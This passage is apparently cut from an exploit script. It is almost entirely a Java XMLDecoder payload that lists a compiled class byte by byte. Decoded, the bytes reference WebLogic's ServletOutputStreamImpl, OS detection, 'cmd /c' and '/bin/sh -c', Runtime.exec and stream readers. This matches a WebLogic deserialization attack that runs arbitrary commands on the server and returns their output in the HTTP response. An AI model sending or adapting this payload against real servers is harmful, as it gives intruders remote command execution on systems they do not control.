index=\"2365\"><byte>0</byte></void><void index=\"2366\"><byte>20</byte></void><void index=\"2367\"><byte>40</byte></void><void index=\"2368\"><byte>41</byte></void><void index=\"2369\"><byte>76</byte></void><void index=\"2370\"><byte>106</byte></void><void index=\"2371\"><byte>97</byte></void><void index=\"2372\"><byte>118</byte></void><void index=\"2373\"><byte>97</byte></void><void index=\"2374\"><byte>47</byte></void><void index=\"2375\"><byte>108</byte></void><void index=\"2376\"><byte>97</byte></void><void index=\"2377\"><byte>110</byte></void><void index=\"2378\"><byte>103</byte></void><void index=\"2379\"><byte>47</byte></void><void index=\"2380\"><byte>83</byte></void><void index=\"2381\"><byte>116</byte></void><void index=\"2382\"><byte>114</byte></void><void index=\"2383\"><byte>105</byte></void><void index=\"2384\"><byte>110</byte></void><void index=\"2385\"><byte>103</byte></void><void index=\"2386\"><byte>59</byte></void><void index=\"2387\"><byte>12</byte></void><void index=\"2388\"><byte>0</byte></void><void index=\"2389\"><byte>89</byte></void><void index=\"2390\"><byte>0</byte></void><void index=\"2391\"><byte>90</byte></void><void index=\"2392\"><byte>10</byte></void><void index=\"2393\"><byte>0</byte></void><void index=\"2394\"><byte>81</byte></void><void index=\"2395\"><byte>0</byte></void><void index=\"2396\"><byte>91</byte></void><void index=\"2397\"><byte>12</byte></void><void index=\"2398\"><byte>0</byte></void><void index=\"2399\"><byte>10</byte></void><void index=\"2400\"><byte>0</byte></void><void index=\"2401\"><byte>71</byte></void><void index=\"2402\"><byte>10</byte></void><void index=\"2403\"><byte>0</byte></void><void index=\"2404\"><byte>79</byte></void><void index=\"2405\"><byte>0</byte></void><void index=\"2406\"><byte>93</byte></void><void index=\"2407\"><byte>1</byte></void><void index=\"2408\"><byte>0</byte></void><void index=\"2409\"><byte>49</byte></void><void index=\"2410\"><byte>119</byte></void><void index=\"2411\"><byte>101</byte></void><void index=\"2412\"><byte>98</byte></void><void index=\"2413\"><byte>108</byte></void><void index=\"2414\"><byte>111</byte></void><void index=\"2415\"><byte>103</byte></void><void index=\"2416\"><byte>105</byte></void><void index=\"2417\"><byte>99</byte></void><void index=\"2418\"><byte>47</byte></void><void index=\"2419\"><byte>115</byte></void><void index=\"2420\"><byte>101</byte></void><void index=\"2421\"><byte>114</byte></void><void index=\"2422\"><byte>118</byte></void><void index=\"2423\"><byte>108</byte></void><void index=\"2424\"><byte>101</byte></void><void index=\"2425\"><byte>116</byte></void><void index=\"2426\"><byte>47</byte></void><void index=\"2427\"><byte>105</byte></void><void index=\"2428\"><byte>110</byte></void><void index=\"2429\"><byte>116</byte></void><void index=\"2430\"><byte>101</byte></void><void index=\"2431\"><byte>114</byte></void><void index=\"2432\"><byte>110</byte></void><void index=\"2433\"><byte>97</byte></void><void index=\"2434\"><byte>108</byte></void><void index=\"2435\"><byte>47</byte></void><void index=\"2436\"><byte>83</byte></void><void index=\"2437\"><byte>101</byte></void><void index=\"2438\"><byte>114</byte></void><void index=\"2439\"><byte>118</byte></void><void index=\"2440\"><byte>108</byte></void><void index=\"2441\"><byte>101</byte></void><void index=\"2442\"><byte>116</byte></void><void index=\"2443\"><byte>79</byte></void><void index=\"2444\"><byte>117</byte></void><void index=\"2445\"><byte>116</byte></void><void index=\"2446\"><byte>112</byte></void><void index=\"2447\"><byte>117</byte></void><void index=\"2448\"><byte>116</byte></void><void index=\"2449\"><byte>83</byte></void><void index=\"2450\"><byte>116</byte></void><void index=\"2451\"><byte>114</byte></void><void index=\"2452\"><byte>101</byte></void><void index=\"2453\"><byte>97</byte></void><void index=\"2454\"><byte>109</byte></void><void index=\"2455\"><byte>73</byte></void><void index=\"2456\"><byte>109</byte></void><void index=\"2457\"><byte>112</byte></void><void index=\"2458\"><byte>108</byte></void><void index=\"2459\"><byte>7</byte></void><void index=\"2460\"><byte>0</byte></void><void index=\"2461\"><byte>95</byte></void><void index=\"2462\"><byte>1</byte></void><void index=\"2463\"><byte>0</byte></void><void index=\"2464\"><byte>11</byte></void><void index=\"2465\"><byte>119</byte></void><void index=\"2466\"><byte>114</byte></void><void index=\"2467\"><byte>105</byte></void><void index=\"2468\"><byte>116</byte></void><void index=\"2469\"><byte>101</byte></void><void index=\"2470\"><byte>83</byte></void><void index=\"2471\"><byte>116</byte></void><void index=\"2472\"><byte>114</byte></void><void index=\"2473\"><byte>101</byte></void><void index=\"2474\"><byte>97</byte></void><void index=\"2475\"><byte>109</byte></void><void index=\"2476\"><byte>1</byte></void><void index=\"2477\"><byte>0</byte></void><void index=\"2478\"><byte>24</byte></void><void index=\"2479\"><byte>40</byte></void><void index=\"2480\"><byte>76</byte></void><void index=\"2481\"><byte>106</byte></void><void index=\"2482\"><byte>97</byte></void><void index=\"2483\"><byte>118</byte></void><void index=\"2484\"><byte>97</byte></void><void index=\"2485\"><byte>47</byte></void><void index=\"2486\"><byte>105</byte></void><void index=\"2487\"><byte>111</byte></void><void index=\"2488\"><byte>47</byte></void><void index=\"2489\"><byte>73</byte></void><void index=\"2490\"><byte>110</byte></void><void index=\"2491\"><byte>112</byte></void><void index=\"2492\"><byte>117</byte></void><void index=\"2493\"><byte>116</byte></void><void index=\"2494\"><byte>83</byte></void><void index=\"2495\"><byte>116</byte></void><void index=\"2496\"><byte>114</byte></void><void index=\"2497\"><byte>101</byte></void><void index=\"2498\"><byte>97</byte></void><void index=\"2499\"><byte>109</byte></void><void index=\"2500\"><byte>59</byte></void><void index=\"2501\"><byte>41</byte></void><void index=\"2502\"><byte>86</byte></void><void index=\"2503\"><byte>12</byte></void><void index=\"2504\"><byte>0</byte></void><void index=\"2505\"><byte>97</byte></void><void index=\"2506\"><byte>0</byte></void><void index=\"2507\"><byte>98</byte></void><void index=\"2508\"><byte>10</byte></void><void index=\"2509\"><byte>0</byte></void><void index=\"2510\"><byte>96</byte></void><void index=\"2511\"><byte>0</byte></void><void index=\"2512\"><byte>99</byte></void><void index=\"2513\"><byte>1</byte></void><void index=\"2514\"><byte>0</byte></void><void index=\"2515\"><byte>5</byte></void><void index=\"2516\"><byte>102</byte></void><void index=\"2517\"><byte>108</byte></void><void index=\"2518\"><byte>117</byte></void><void index=\"2519\"><byte>115</byte></void><void index=\"2520\"><byte>104</byte></void><void index=\"2521\"><byte>12</byte></void><void index=\"2522\"><byte>0</byte></void><void index=\"2523\"><byte>101</byte></void><void index=\"2524\"><byte>0</byte></void><void index=\"2525\"><byte>11</byte></void><void index=\"2526\"><byte>10</byte></void><void index=\"2527\"><byte>0</byte></void><void index=\"2528\"><byte>96</byte></void><void index=\"2529\"><byte>0</byte></void><void index=\"2530\"><byte>102</byte></void><void index=\"2531\"><byte>1</byte></void><void index=\"2532\"><byte>0</byte></void><void index=\"2533\"><byte>7</byte></void><void index=\"2534\"><byte>111</byte></void><void index=\"2535\"><byte>115</byte></void><void index=\"2536\"><byte>46</byte></void><void index=\"2537\"><byte>110</byte></void><void index=\"2538\"><byte>97</byte></void><void index=\"2539\"><byte>109</byte></void><void index=\"2540\"><byte>101</byte></void><void index=\"2541\"><byte>8</byte></void><void index=\"2542\"><byte>0</byte></void><void index=\"2543\"><byte>104</byte></void><void index=\"2544\"><byte>1</byte></void><void index=\"2545\"><byte>0</byte></void><void index=\"2546\"><byte>16</byte></void><void index=\"2547\"><byte>106</byte></void><void index=\"2548\"><byte>97</byte></void><void index=\"2549\"><byte>118</byte></void><void index=\"2550\"><byte>97</byte></void><void index=\"2551\"><byte>47</byte></void><void index=\"2552\"><byte>108</byte></void><void index=\"2553\"><byte>97</byte></void><void index=\"2554\"><byte>110</byte></void><void index=\"2555\"><byte>103</byte></void><void index=\"2556\"><byte>47</byte></void><void index=\"2557\"><byte>83</byte></void><void index=\"2558\"><byte>121</byte></void><void index=\"2559\"><byte>115</byte></void><void index=\"2560\"><byte>116</byte></void><void index=\"2561\"><byte>101</byte></void><void index=\"2562\"><byte>109</byte></void><void index=\"2563\"><byte>7</byte></void><void index=\"2564\"><byte>0</byte></void><void index=\"2565\"><byte>106</byte></void><void index=\"2566\"><byte>1</byte></void><void index=\"2567\"><byte>0</byte></void><void index=\"2568\"><byte>11</byte></void><void index=\"2569\"><byte>103</byte></void><void index=\"2570\"><byte>101</byte></void><void index=\"2571\"><byte>116</byte></void><void index=\"2572\"><byte>80</byte></void><void index=\"2573\"><byte>114</byte></void><void index=\"2574\"><byte>111</byte></void><void index=\"2575\"><byte>112</byte></void><void index=\"2576\"><byte>101</byte></void><void index=\"2577\"><byte>114</byte></void><void index=\"2578\"><byte>116</byte></void><void index=\"2579\"><byte>121</byte></void><void index=\"2580\"><byte>12</byte></void><void index=\"2581\"><byte>0</byte></void><void index=\"2582\"><byte>108</byte></void><void index=\"2583\"><byte>0</byte></void><void index=\"2584\"><byte>59</byte></void><void index=\"2585\"><byte>10</byte></void><void index=\"2586\"><byte>0</byte></void><void index=\"2587\"><byte>107</byte></void><void index=\"2588\"><byte>0</byte></void><void index=\"2589\"><byte>109</byte></void><void index=\"2590\"><byte>1</byte></void><void index=\"2591\"><byte>0</byte></void><void index=\"2592\"><byte>16</byte></void><void index=\"2593\"><byte>106</byte></void><void index=\"2594\"><byte>97</byte></void><void index=\"2595\"><byte>118</byte></void><void index=\"2596\"><byte>97</byte></void><void index=\"2597\"><byte>47</byte></void><void index=\"2598\"><byte>108</byte></void><void index=\"2599\"><byte>97</byte></void><void index=\"2600\"><byte>110</byte></void><void index=\"2601\"><byte>103</byte></void><void index=\"2602\"><byte>47</byte></void><void index=\"2603\"><byte>83</byte></void><void index=\"2604\"><byte>116</byte></void><void index=\"2605\"><byte>114</byte></void><void index=\"2606\"><byte>105</byte></void><void index=\"2607\"><byte>110</byte></void><void index=\"2608\"><byte>103</byte></void><void index=\"2609\"><byte>7</byte></void><void index=\"2610\"><byte>0</byte></void><void index=\"2611\"><byte>111</byte></void><void index=\"2612\"><byte>1</byte></void><void index=\"2613\"><byte>0</byte></void><void index=\"2614\"><byte>11</byte></void><void index=\"2615\"><byte>116</byte></void><void index=\"2616\"><byte>111</byte></void><void index=\"2617\"><byte>76</byte></void><void index=\"2618\"><byte>111</byte></void><void index=\"2619\"><byte>119</byte></void><void index=\"2620\"><byte>101</byte></void><void index=\"2621\"><byte>114</byte></void><void index=\"2622\"><byte>67</byte></void><void index=\"2623\"><byte>97</byte></void><void index=\"2624\"><byte>115</byte></void><void index=\"2625\"><byte>101</byte></void><void index=\"2626\"><byte>12</byte></void><void index=\"2627\"><byte>0</byte></void><void index=\"2628\"><byte>113</byte></void><void index=\"2629\"><byte>0</byte></void><void index=\"2630\"><byte>90</byte></void><void index=\"2631\"><byte>10</byte></void><void index=\"2632\"><byte>0</byte></void><void index=\"2633\"><byte>112</byte></void><void index=\"2634\"><byte>0</byte></void><void index=\"2635\"><byte>114</byte></void><void index=\"2636\"><byte>1</byte></void><void index=\"2637\"><byte>0</byte></void><void index=\"2638\"><byte>3</byte></void><void index=\"2639\"><byte>119</byte></void><void index=\"2640\"><byte>105</byte></void><void index=\"2641\"><byte>110</byte></void><void index=\"2642\"><byte>8</byte></void><void index=\"2643\"><byte>0</byte></void><void index=\"2644\"><byte>116</byte></void><void index=\"2645\"><byte>1</byte></void><void index=\"2646\"><byte>0</byte></void><void index=\"2647\"><byte>8</byte></void><void index=\"2648\"><byte>99</byte></void><void index=\"2649\"><byte>111</byte></void><void index=\"2650\"><byte>110</byte></void><void index=\"2651\"><byte>116</byte></void><void index=\"2652\"><byte>97</byte></void><void index=\"2653\"><byte>105</byte></void><void index=\"2654\"><byte>110</byte></void><void index=\"2655\"><byte>115</byte></void><void index=\"2656\"><byte>1</byte></void><void index=\"2657\"><byte>0</byte></void><void index=\"2658\"><byte>27</byte></void><void index=\"2659\"><byte>40</byte></void><void index=\"2660\"><byte>76</byte></void><void index=\"2661\"><byte>106</byte></void><void index=\"2662\"><byte>97</byte></void><void index=\"2663\"><byte>118</byte></void><void index=\"2664\"><byte>97</byte></void><void index=\"2665\"><byte>47</byte></void><void index=\"2666\"><byte>108</byte></void><void index=\"2667\"><byte>97</byte></void><void index=\"2668\"><byte>110</byte></void><void index=\"2669\"><byte>103</byte></void><void index=\"2670\"><byte>47</byte></void><void index=\"2671\"><byte>67</byte></void><void index=\"2672\"><byte>104</byte></void><void index=\"2673\"><byte>97</byte></void><void index=\"2674\"><byte>114</byte></void><void index=\"2675\"><byte>83</byte></void><void index=\"2676\"><byte>101</byte></void><void index=\"2677\"><byte>113</byte></void><void index=\"2678\"><byte>117</byte></void><void index=\"2679\"><byte>101</byte></void><void index=\"2680\"><byte>110</byte></void><void index=\"2681\"><byte>99</byte></void><void index=\"2682\"><byte>101</byte></void><void index=\"2683\"><byte>59</byte></void><void index=\"2684\"><byte>41</byte></void><void index=\"2685\"><byte>90</byte></void><void index=\"2686\"><byte>12</byte></void><void index=\"2687\"><byte>0</byte></void><void index=\"2688\"><byte>118</byte></void><void index=\"2689\"><byte>0</byte></void><void index=\"2690\"><byte>119</byte></void><void index=\"2691\"><byte>10</byte></void><void index=\"2692\"><byte>0</byte></void><void index=\"2693\"><byte>112</byte></void><void index=\"2694\"><byte>0</byte></void><void index=\"2695\"><byte>120</byte></void><void index=\"2696\"><byte>1</byte></void><void index=\"2697\"><byte>0</byte></void><void index=\"2698\"><byte>17</byte></void><void index=\"2699\"><byte>106</byte></void><void index=\"2700\"><byte>97</byte></void><void index=\"2701\"><byte>118</byte></void><void index=\"2702\"><byte>97</byte></void><void index=\"2703\"><byte>47</byte></void><void index=\"2704\"><byte>108</byte></void><void index=\"2705\"><byte>97</byte></void><void index=\"2706\"><byte>110</byte></void><void index=\"2707\"><byte>103</byte></void><void index=\"2708\"><byte>47</byte></void><void index=\"2709\"><byte>82</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>110</byte></void><void index=\"2712\"><byte>116</byte></void><void index=\"2713\"><byte>105</byte></void><void index=\"2714\"><byte>109</byte></void><void index=\"2715\"><byte>101</byte></void><void index=\"2716\"><byte>7</byte></void><void index=\"2717\"><byte>0</byte></void><void index=\"2718\"><byte>122</byte></void><void index=\"2719\"><byte>1</byte></void><void index=\"2720\"><byte>0</byte></void><void index=\"2721\"><byte>10</byte></void><void index=\"2722\"><byte>103</byte></void><void index=\"2723\"><byte>101</byte></void><void index=\"2724\"><byte>116</byte></void><void index=\"2725\"><byte>82</byte></void><void index=\"2726\"><byte>117</byte></void><void index=\"2727\"><byte>110</byte></void><void index=\"2728\"><byte>116</byte></void><void index=\"2729\"><byte>105</byte></void><void index=\"2730\"><byte>109</byte></void><void index=\"2731\"><byte>101</byte></void><void index=\"2732\"><byte>1</byte></void><void index=\"2733\"><byte>0</byte></void><void index=\"2734\"><byte>21</byte></void><void index=\"2735\"><byte>40</byte></void><void index=\"2736\"><byte>41</byte></void><void index=\"2737\"><byte>76</byte></void><void index=\"2738\"><byte>106</byte></void><void index=\"2739\"><byte>97</byte></void><void index=\"2740\"><byte>118</byte></void><void index=\"2741\"><byte>97</byte></void><void index=\"2742\"><byte>47</byte></void><void index=\"2743\"><byte>108</byte></void><void index=\"2744\"><byte>97</byte></void><void index=\"2745\"><byte>110</byte></void><void index=\"2746\"><byte>103</byte></void><void index=\"2747\"><byte>47</byte></void><void index=\"2748\"><byte>82</byte></void><void index=\"2749\"><byte>117</byte></void><void index=\"2750\"><byte>110</byte></void><void index=\"2751\"><byte>116</byte></void><void index=\"2752\"><byte>105</byte></void><void index=\"2753\"><byte>109</byte></void><void index=\"2754\"><byte>101</byte></void><void index=\"2755\"><byte>59</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>0</byte></void><void index=\"2758\"><byte>124</byte></void><void index=\"2759\"><byte>0</byte></void><void index=\"2760\"><byte>125</byte></void><void index=\"2761\"><byte>10</byte></void><void index=\"2762\"><byte>0</byte></void><void index=\"2763\"><byte>123</byte></void><void index=\"2764\"><byte>0</byte></void><void index=\"2765\"><byte>126</byte></void><void index=\"2766\"><byte>1</byte></void><void index=\"2767\"><byte>0</byte></void><void index=\"2768\"><byte>7</byte></void><void index=\"2769\"><byte>99</byte></void><void index=\"2770\"><byte>109</byte></void><void index=\"2771\"><byte>100</byte></void><void index=\"2772\"><byte>32</byte></void><void index=\"2773\"><byte>47</byte></void><void index=\"2774\"><byte>99</byte></void><void index=\"2775\"><byte>32</byte></void><void index=\"2776\"><byte>8</byte></void><void index=\"2777\"><byte>0</byte></void><void index=\"2778\"><byte>-128</byte></void><void index=\"2779\"><byte>1</byte></void><void index=\"2780\"><byte>0</byte></void><void index=\"2781\"><byte>4</byte></void><void index=\"2782\"><byte>101</byte></void><void index=\"2783\"><byte>120</byte></void><void index=\"2784\"><byte>101</byte></void><void index=\"2785\"><byte>99</byte></void><void index=\"2786\"><byte>1</byte></void><void index=\"2787\"><byte>0</byte></void><void index=\"2788\"><byte>39</byte></void><void index=\"2789\"><byte>40</byte></void><void index=\"2790\"><byte>76</byte></void><void index=\"2791\"><byte>106</byte></void><void index=\"2792\"><byte>97</byte></void><void index=\"2793\"><byte>118</byte></void><void index=\"2794\"><byte>97</byte></void><void index=\"2795\"><byte>47</byte></void><void index=\"2796\"><byte>108</byte></void><void index=\"2797\"><byte>97</byte></void><void index=\"2798\"><byte>110</byte></void><void index=\"2799\"><byte>103</byte></void><void index=\"2800\"><byte>47</byte></void><void index=\"2801\"><byte>83</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>114</byte></void><void index=\"2804\"><byte>105</byte></void><void index=\"2805\"><byte>110</byte></void><void index=\"2806\"><byte>103</byte></void><void index=\"2807\"><byte>59</byte></void><void index=\"2808\"><byte>41</byte></void><void index=\"2809\"><byte>76</byte></void><void index=\"2810\"><byte>106</byte></void><void index=\"2811\"><byte>97</byte></void><void index=\"2812\"><byte>118</byte></void><void index=\"2813\"><byte>97</byte></void><void index=\"2814\"><byte>47</byte></void><void index=\"2815\"><byte>108</byte></void><void index=\"2816\"><byte>97</byte></void><void index=\"2817\"><byte>110</byte></void><void index=\"2818\"><byte>103</byte></void><void index=\"2819\"><byte>47</byte></void><void index=\"2820\"><byte>80</byte></void><void index=\"2821\"><byte>114</byte></void><void index=\"2822\"><byte>111</byte></void><void index=\"2823\"><byte>99</byte></void><void index=\"2824\"><byte>101</byte></void><void index=\"2825\"><byte>115</byte></void><void index=\"2826\"><byte>115</byte></void><void index=\"2827\"><byte>59</byte></void><void index=\"2828\"><byte>12</byte></void><void index=\"2829\"><byte>0</byte></void><void index=\"2830\"><byte>-126</byte></void><void index=\"2831\"><byte>0</byte></void><void index=\"2832\"><byte>-125</byte></void><void index=\"2833\"><byte>10</byte></void><void index=\"2834\"><byte>0</byte></void><void index=\"2835\"><byte>123</byte></void><void index=\"2836\"><byte>0</byte></void><void index=\"2837\"><byte>-124</byte></void><void index=\"2838\"><byte>1</byte></void><void index=\"2839\"><byte>0</byte></void><void index=\"2840\"><byte>11</byte></void><void index=\"2841\"><byte>47</byte></void><void index=\"2842\"><byte>98</byte></void><void index=\"2843\"><byte>105</byte></void><void index=\"2844\"><byte>110</byte></void><void index=\"2845\"><byte>47</byte></void><void index=\"2846\"><byte>115</byte></void><void index=\"2847\"><byte>104</byte></void><void index=\"2848\"><byte>32</byte></void><void index=\"2849\"><byte>45</byte></void><void index=\"2850\"><byte>99</byte></void><void index=\"2851\"><byte>32</byte></void><void index=\"2852\"><byte>8</byte></void><void index=\"2853\"><byte>0</byte></void><void index=\"2854\"><byte>-122</byte></void><void index=\"2855\"><byte>1</byte></void><void index=\"2856\"><byte>0</byte></void><void index=\"2857\"><byte>22</byte></void><void index=\"2858\"><byte>106</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>118</byte></void><void index=\"2861\"><byte>97</byte></void><void index=\"2862\"><byte>47</byte></void><void index=\"2863\"><byte>105</byte></void><void index=\"2864\"><byte>111</byte></void><void index=\"2865\"><byte>47</byte></void><void index=\"2866\"><byte>66</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>102</byte></void><void index=\"2869\"><byte>102</byte></void><void index=\"2870\"><byte>101</byte></void><void index=\"2871\"><byte>114</byte></void><void index=\"2872\"><byte>101</byte></void><void index=\"2873\"><byte>100</byte></void><void index=\"2874\"><byte>82</byte></void><void index=\"2875\"><byte>101</byte></void><void index=\"2876\"><byte>97</byte></void><void index=\"2877\"><byte>100</byte></void><void index=\"2878\"><byte>101</byte></void><void index=\"2879\"><byte>114</byte></void><void index=\"2880\"><byte>7</byte></void><void index=\"2881\"><byte>0</byte></void><void index=\"2882\"><byte>-120</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>25</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>105</byte></void><void index=\"2892\"><byte>111</byte></void><void index=\"2893\"><byte>47</byte></void><void index=\"2894\"><byte>73</byte></void><void index=\"2895\"><byte>110</byte></void><void index=\"2896\"><byte>112</byte></void><void index=\"2897\"><byte>117</byte></void><void index=\"2898\"><byte>116</byte></void><void index=\"2899\"><byte>83</byte></void><void index=\"2900\"><byte>116</byte></void><void index=\"2901\"><byte>114</byte></void><void index=\"2902\"><byte>101</byte></void><void index=\"2903\"><byte>97</byte></void><void index=\"2904\"><byte>109</byte></void><void index=\"2905\"><byte>82</byte></void><void index=\"2906\"><byte>101</byte></void><void index=\"2907\"><byte>97</byte></void><void index=\"2908\"><byte>100</byte></void><void index=\"2909\"><byte>101</byte></void><void index=\"2910\"><byte>114</byte></void><void index=\"2911\"><byte>7</byte></void><void index=\"2912\"><byte>0</byte></void><void index=\"2913\"><byte>-118</byte></void><void index=\"2914\"><byte>1</byte></void><void index=\"2915\"><byte>0</byte></void><void index=\"2916\"><byte>17</byte></void><void index=\"2917\"><byte>106</byte></void><void index=\"2918\"><byte>97</byte></void><void index=\"2919\"><byte>118</byte></void><void index=\"2920\"><byte>97</byte></void><void index=\"2921\"><byte>47</byte></void><void index=\"2922\"><byte>108</byte></void><void index=\"2923\"><byte>97</byte></void><void index=\"2924\"><byte>110</byte></void><void index=\"2925\"><byte>103</byte></void><void index=\"2926\"><byte>47</byte></void><void index=\"2927\"><byte>80</byte></void><void index=\"2928\"><byte>114</byte></void><void index=\"2929\"><byte>111</byte></void><void index=\"2930\"><byte>99</byte></void><void index=\"2931\"><byte>101</byte></void><void index=\"2932\"><byte>115</byte></void><void index=\"2933\"><byte>115</byte></void><void index=\"2934\"><byte>7</byte></void><void index=\"2935\"><byte>0</byte></void><void index=\"2936\"><byte>-116</byte></void><void index=\"2937\"><byte>1</byte></void><void index=\"2938\"><byte>0</byte></void><void index=\"2939\"><byte>14</byte></void><void index=\"2940\"><byte>103</byte></void><void index=\"2941\"><byte>101</byte></void><void index=\"2942\"><byte>116</byte></void><void index=\"2943\"><byte>73</byte></void><void index=\"2944\"><byte>110</byte></void><void index=\"2945\"><byte>112</byte></void><void index=\"2946\"><byte>117</byte></void><void index=\"2947\"><byte>116</byte></void><void index=\"2948\"><byte>83</byte></void><void index=\"2949\"><byte>116</byte></void><void index=\"2950\"><byte>114</byte></void><void index=\"2951\"><byte>101</byte></void><void index=\"2952\"><byte>97</byte></void><void index=\"2953\"><byte>109</byte></void><void index=\"2954\"><byte>1</byte></void><void index=\"2955\"><byte>0</byte></void><void index=\"2956\"><byte>23</byte></void><void index=\"2957\"><byte>40</byte></void><void index=\"2958\"><byte>41</byte></void><void index=\"2959\"><byte>76</byte></void><void index=\"2960\"><byte>106</byte></void><void index=\"2961\"><byte>97</byte></void><void index=\"2962\"><byte>118</byte></void><void index=\"2963\"><byte>97</byte></void><void index=\"2964\"><byte>47</byte></void><void index=\"2965\"><byte>105</byte></void><void index=\"2966\"><byte>111</byte></void><void index=\"2967\"><byte>47</byte></void><void index=\"2968\"><byte>73</byte></void><void index=\"2969\"><byte>110</byte></void><void index=\"2970\"><byte>112</byte></void><void index=\"2971\"><byte>117</byte></void><void index=\"2972\"><byte>116</byte></void><void index=\"2973\"><byte>83</byte></void><void index=\"2974\"><byte>116</byte></void><void index=\"2975\"><byte>114</byte></void><void index=\"2976\"><byte>101</byte></void><void index=\"2977\"><byte>97</byte></void><void index=\"2978\"><byte>109</byte></void><void index=\"2979\"><byte>59</byte></void><void index=\"2980\"><byte>12</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>-114</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>-113</byte></void><void index=\"2985\"><byte>10</byte></void><void index=\"2986\"><byte>0</byte></void><void index=\"2987\"><byte>-115</byte></void><void index=\"2988\"><byte>0</byte></void><void index=\"2989\"><byte>-112</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>42</byte></void><void index=\"2993\"><byte>40</byte></void><void index=\"2994\"><byte>76</byte></void><void index=\"2995\"><byte>106</byte></void><void index=\"2996\"><byte>97</byte></void><void index=\"2997\"><byte>118</byte></void><void index=\"2998\"><byte>97</byte></void><void index=\"2999\"><byte>47</byte></void><void index=\"3000\"><byte>105</byte></void><void index=\"3001\"><byte>111</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>73</byte></void><void index=\"3004\"><byte>110</byte></void><void index=\"3005\"><byte>112</byte></void><void index=\"3006\"><byte>117</byte></void><void index=\"3007\"><byte>116</byte></void><void index=\"3008\"><byte>83</byte></void><void index=\"3009\"><byte>116</byte></void><void index=\"3010\"><byte>114</byte></void><void index=\"3011\"><byte>101</byte></void><void index=\"3012\"><byte>97</byte></void><void index=\"3013\"><byte>109</byte></void><void index=\"3014\"><byte>59</byte></void><void index=\"3015\"><byte>76</byte></void><void index=\"3016\"><byte>106</byte></void><void index=\"3017\"><byte>97</byte></void><void index=\"3018\"><byte>118</byte></void><void index=\"3019\"><byte>97</byte></void><void index=\"3020\"><byte>47</byte></void><void index=\"3021\"><byte>108</byte></void><void index=\"3022\"><byte>97</byte></void><void index=\"3023\"><byte>110</byte></void><void index=\"3024\"><byte>103</byte></void><void index=\"3025\"><byte>47</byte></void><void index=\"3026\"><byte>83</byte></void><void index=\"3027\"><byte>116</byte></void><void index=\"3028\"><byte>114</byte></void><void index=\"3029\"><byte>105</byte></void><void index=\"3030\"><byte>110</byte></void><void index=\"3031\"><byte>103</byte></void><void index=\"3032\"><byte>59</byte></void><void index=\"3033\"><byte>41</byte></void><void index=\"3034\"><byte>86</byte></void><void index=\"3035\"><byte>12</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>10</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>-110</byte></void><void index=\"3040\"><byte>10</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>-117</byte></void><void index=\"3043\"><byte>0</byte></void><void index=\"3044\"><byte>-109</byte></void><void index=\"3045\"><byte>1</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>19</byte></void><void index=\"3048\"><byte>40</byte></void><void index=\"3049\"><byte>76</byte></void><void index=\"3050\"><byte>106</byte></void><void index=\"3051\"><byte>97</byte></void><void index=\"3052\"><byte>118</byte></void><void index=\"3053\"><byte>97</byte></void><void index=\"3054\"><byte>47</byte></void><void index=\"3055\"><byte>105</byte></void><void index=\"3056\"><byte>111</byte></void><void index=\"3057\"><byte>47</byte></void><void index=\"3058\"><byte>82</byte></void><void index=\"3059\"><byte>101</byte></void><void index=\"3060\"><byte>97</byte></void><void index=\"3061\"><byte>100</byte></void><void index=\"3062\"><byte>101</byte></void><void index=\"3063\"><byte>114</byte></void><void index=\"3064\"><byte>59</byte></void><void index=\"3065\"><byte>41</byte></void><void index=\"3066\"><byte>86</byte></void><void index=\"3067\"><byte>12</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>10</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>-107</byte></void><void index=\"3072\"><byte>10</byte></void><void index=\"3073\"><byte>0</byte></void><void index=\"3074\"><byte>-119</byte></void><void index=\"3075\"><byte>0</byte></void><void index=\"3076\"><byte>-106</byte></void><void index=\"3077\"><byte>1</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>0</byte></void><void index=\"3080\"><byte>8</byte></void><void index=\"3081\"><byte>0</byte></void><void index=\"3082\"><byte>-104</byte></void><void index=\"3083\"><byte>1</byte></void><void index=\"3084\"><byte>0</byte></void><void index=\"3085\"><byte>8</byte></void><void index=\"3086\"><byte>114</byte></void><void index=\"3087\"><byte>101</byte></void><void index=\"3088\"><byte>97</byte></void><void index=\"3089\"><byte>100</byte></void><void index=\"3090\"><byte>76</byte></void><void index=\"3091\"><byte>105</byte></void><void index=\"3092\"><byte>110</byte></void><void index=\"3093\"><byte>101</byte></void><void index=\"3094\"><byte>12</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>-102</byte></void><void index=\"3097\"><byte>0</byte></void><void index=\"3098\"><byte>90</byte></void><void index=\"3099\"><byte>10</byte></void><void index=\"3100\"><byte>0</byte></void><void index=\"3101\"><byte>-119</byte></void><void index=\"3102\"><byte>0</byte></void><void index=\"3103\"><byte>-101</byte></void><void index=\"3104\"><byte>1</byte></void><void index=\"3105\"><byte>0</byte></void><void index=\"3106\"><byte>9</byte></void><void index=\"3107\"><byte>103</byte></void><void index=\"3108\"><byte>101</byte></void><void index=\"3109\"><byte>116</byte></void><void index=\"3110\"><byte>87</byte></void><void index=\"3111\"><byte>114</byte></void><void index=\"3112\"><byte>105</byte></void><void 